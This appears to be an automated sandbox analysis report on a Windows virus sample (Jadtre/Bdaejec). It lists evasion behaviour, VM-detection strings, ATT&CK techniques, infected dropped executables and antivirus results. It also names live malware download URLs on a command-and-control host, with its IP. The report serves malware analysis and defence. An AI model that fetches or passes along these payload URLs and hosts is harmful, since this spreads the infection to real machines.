Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-1074

Source: C:\Users\user\Desktop\aRxo3E278B.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-7022

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Code function: 1_2_008F1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 008F1754h

1_2_008F1718

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Code function: 1_2_008F29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_008F29E2

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Code function: 1_2_008F2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_008F2B8C

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

API call chain: ExitProcess graph end node

graph_1-1049

Source: C:\Users\user\Desktop\aRxo3E278B.exe

Code function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00401EE2

Source: C:\Users\user\Desktop\aRxo3E278B.exe

0_2_00409607

Source: C:\Users\user\Desktop\aRxo3E278B.exe

Code function: 0_2_00414044 mov eax, dword ptr fs:[00000030h]

0_2_00414044

Source: C:\Users\user\Desktop\aRxo3E278B.exe

Code function: 0_2_0040CD6B CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_0040CD6B

Source: C:\Users\user\Desktop\aRxo3E278B.exe	Code function: 0_2_00409867 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	0_2_00409867
Source: C:\Users\user\Desktop\aRxo3E278B.exe	Code function: 0_2_00406000 SetUnhandledExceptionFilter,	0_2_00406000
Source: C:\Users\user\Desktop\aRxo3E278B.exe	Code function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00401EE2
Source: C:\Users\user\Desktop\aRxo3E278B.exe	Code function: 0_2_004035C0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004035C0

Source: SciTE.exe.1.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\aRxo3E278B.exe

Code function: GetLocaleInfoA,

0_2_0040A82A

Source: C:\Users\user\Desktop\aRxo3E278B.exe

Code function: 0_2_00406507 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00406507

Source: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Code function: 1_2_008F139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_008F139F

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: rbQTKRDg.exe PID: 5580, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: rbQTKRDg.exe PID: 5580, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Native API	Boot or Logon Initialization Scripts	2 Process Injection	1 Access Token Manipulation	LSASS Memory	131 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	2 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	13 System Information Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
aRxo3E278B.exe	97%	ReversingLabs	Win32.Virus.Jadtre
aRxo3E278B.exe	89%	Virustotal		Browse
aRxo3E278B.exe	100%	Avira	W32/Jadtre.B
aRxo3E278B.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	97%	ReversingLabs	Win32.Trojan.Skeeyah

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://www.scintilla.org/scite.rng	0%	Avira URL Cloud	safe
http://www.rftp.comJosiah	0%	Avira URL Cloud	safe
http://www.activestate.com	0%	Avira URL Cloud	safe
http://www.activestate.comHolger	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar)lZ	100%	Avira URL Cloud	malware
http://www.rftp.com	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarp	100%	Avira URL Cloud	malware
http://www.baanboard.comBrendon	0%	Avira URL Cloud	safe
http://www.scintilla.org	0%	Avira URL Cloud	safe
https://www.smartsharesystems.com/	0%	Avira URL Cloud	safe
http://www.spaceblue.comMathias	0%	Avira URL Cloud	safe
http://www.develop.com	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar9	100%	Avira URL Cloud	malware
https://www.smartsharesystems.com/Morten	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarel	100%	Avira URL Cloud	malware
http://www.lua.org	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarV	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager	100%	Avira URL Cloud	malware
http://www.spaceblue.com	0%	Avira URL Cloud	safe
http://www.baanboard.com	0%	Avira URL Cloud	safe
http://www.develop.comDeepak	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rar	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.scintilla.org/scite.rng	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.rftp.comJosiah	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.activestate.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.activestate.comHolger	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	rbQTKRDg.exe, 00000001.00000003.2098676346.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.1.dr	false		high
http://www.rftp.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar)lZ	rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp, rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarp	rbQTKRDg.exe, 00000001.00000002.2213695127.000000000286A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.baanboard.comBrendon	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.scintilla.org	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarel	rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar9	rbQTKRDg.exe, 00000001.00000002.2213695127.000000000286A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.develop.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.lua.org	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarV	rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000F09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.spaceblue.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager	rbQTKRDg.exe, 00000001.00000002.2213373667.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.baanboard.com	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown
http://www.develop.comDeepak	SciTE.exe.1.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581654
Start date and time:	2024-12-28 12:24:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	aRxo3E278B.exe renamed because original name is a hash value
Original Sample Name:	2024-12-28_93bc13a5ccf808ac29d512748221ce1d.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@5/11@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 19 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94, 40.126.53.16, 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:25:10	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/xoqfqirqhp
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	npukfztj.biz/edmrjb
	http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com	Get hash	malicious	Unknown	Browse	setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/eglmpsrvxnyx
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/peioi
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	npukfztj.biz/cbecuogqej
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	saytjshyf.biz/bkq
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	jhvzpcfg.biz/tgcwttfqletfhyq
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	hehckyov.biz/ircdert

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse	44.221.84.105
	ib.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	1hdqYXYJkr.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(193).exe	Get hash	malicious	Bdaejec, Stealc	Browse	44.221.84.105
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	a2mNMrPxow.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	FIyDwZM4OR.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	e62iSl0abZ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	HGFSqmKwd5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	A3nofpjN9A.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	34.226.108.155

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse
	ib.exe	Get hash	malicious	Bdaejec	Browse
	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse
	8VB4lVuZk3.exe	Get hash	malicious	Bdaejec	Browse
	biKy3nZEyJ.exe	Get hash	malicious	Bdaejec	Browse
	biKy3nZEyJ.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590916695737823
Encrypted:	false
SSDEEP:	384:1F9S9XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:QTQGPL4vzZq2o9W7GsxBbPr
MD5:	834B753B6768A86A65DB3AB0755F147E
SHA1:	3EA5B087F9DFE8F9E609D90039BD994D9F5CE633
SHA-256:	0978B29CCB94AF3148BA5EE6C870D29EAE452C1E07497FD8963C16497B57C0D5
SHA-512:	B38F8012F548E1E9911530540A57FBA8A19E9F8EA8B0BB714A15DE7D09836F92ECFFE2AE0E0F9AC778603921DF7F1B0DE83FC6F462060D6550164CEAEE7B7698
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2389504
Entropy (8bit):	6.731346290726403
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	A4C4417C239BCE0B08098A5C8F2B1048
SHA1:	60BEF1D5429C13401DCA85FCC37B3D5411EC3A44
SHA-256:	1145914DA014CF9E5B9B7C8CB6A95BF8294C9ACDAD010B8422B5C021300FC461
SHA-512:	B42CBDA5F7B5B2B6711A2332C0758792C5243D807CAB52D7A0BC25157AD277D9B44FAE43C7BD72C0256BB9D46FCD67B4D8959BD1D0334914B2FBD610173E62D0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366281220760715
Encrypted:	false
